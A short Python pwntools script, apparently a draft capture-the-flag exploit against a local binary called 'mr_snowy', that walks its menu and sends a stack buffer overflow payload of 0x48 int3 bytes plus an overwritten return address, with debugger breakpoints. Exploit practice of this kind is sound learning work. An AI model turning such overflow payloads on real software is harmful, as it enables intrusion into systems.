29 lines
542 B
Python
29 lines
542 B
Python
import ipdb
|
|
from pwnlib.context import *
|
|
from pwnlib.elf import *
|
|
from pwnlib.tubes.process import *
|
|
from pwnlib.gdb import *
|
|
from pwnlib.util.packing import *
|
|
from pwnlib.rop.rop import *
|
|
|
|
context(arch='x86_64', os='linux')
|
|
context.terminal = ['/usr/bin/alacritty', '-e']
|
|
e = ELF("mr_snowy")
|
|
r = ROP(e)
|
|
ipdb.set_trace()
|
|
p = process(e.path)
|
|
|
|
def do_read():
|
|
while True:
|
|
ll = p.read()
|
|
print(ll)
|
|
if b'>' in ll:
|
|
break
|
|
|
|
do_read()
|
|
p.sendline('1')
|
|
do_read()
|
|
p.sendline(b'\xCC' * 0x48 + p64(0x7fffffffc000))
|
|
|
|
ipdb.set_trace()
|